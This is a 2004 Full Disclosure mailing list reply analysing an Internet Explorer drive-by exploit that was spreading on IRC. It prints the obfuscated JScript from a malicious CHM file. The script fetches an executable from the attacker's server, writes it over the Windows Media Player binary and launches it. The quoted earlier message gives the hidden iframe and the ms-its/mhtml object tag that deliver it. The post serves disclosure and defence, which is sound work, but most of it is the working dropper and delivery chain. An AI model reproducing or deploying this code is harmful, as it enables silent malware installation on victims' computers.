Full Disclosure mailing list archives
Re: IE exploit going around on irc
From: François Harvey <fharvey () securiweb net>
Date: Mon, 05 Apr 2004 15:01:50 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 source of the jscript inside the chm have a nice day <SCRIPT LANGUAGE="javascript"> ~ function getPath(url) { ~ start = url.indexOf('http:') ~ end = url.indexOf('LOI.CHM') ~ return url.substring(start, end); ~ } ~ tehaa = 'ADO' + 'DB' + '.St' + 'ream'; ~ tehao = 'Micro' + 'soft.XM' + 'LHTTP'; ~ tehex = '.exe'; ~ tehwmp = 'C:\\Pr' + 'ogram Files\\Win' + 'dows Media Player\\wmpl' + 'ayer' + tehex; ~ tehmms = 'm' + 'm' + 's' + ':/' + '/'; ~ var tehf = new ActiveXObject(tehaa); ~ tehf.Mode = 3; ~ tehf.Type = 1; ~ tehgURLf = getPath(location.href)+'loi' + tehex; ~ var tehg = new ActiveXObject(tehao); ~ tehg.Open("GET",tehgURLf,0); ~ tehg.Send(); ~ tehf.Open(); ~ tehf.Write(tehg.responseBody); ~ tehf.SaveToFile(tehwmp,2); ~ location.href = tehmms; </SCRIPT> Francois Harvey SecuriWeb inc. Niek Baakman a écrit : | Hi list, | | this thing's been going around on irc the last few days: | | www.divx.dc-hub.com (IE users don't click it!) check source: | <iframe src='loi.htm' width=0 height=0></iframe> | | loi.htm contains: <object | data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm" | type="text/x-scriptlet"></object> | | | LOI.CHM is attached | | Regards, | | Niek Baakman | -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQFAca0ebw9u6+cJxl4RAphzAJ9TRgSBuaPatVFbXBfzqBoKmbrHCACeJ/X8 FZvzRZU2LDEPQyJ0lVMXWiQ= =Bvkg -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- IE exploit going around on irc Niek Baakman (Apr 05)
- Re: IE exploit going around on irc François Harvey (Apr 05)
- Re: IE exploit going around on irc David Jacoby (Apr 06)
- <Possible follow-ups>
- Re: IE exploit going around on irc http-equiv () excite com (Apr 05)
- IE exploit going around on irc Feher Tamas (Apr 06)
- RE: IE exploit going around on irc Thor Larholm (Apr 06)
- Re: IE exploit going around on irc Jelmer (Apr 06)
- Re: IE exploit going around on irc http-equiv () excite com (Apr 06)
- RE: IE exploit going around on irc Thor Larholm (Apr 06)
- Re: IE exploit going around on irc Jelmer (Apr 06)
- Re: IE exploit going around on irc Lise Moorveld (Apr 07)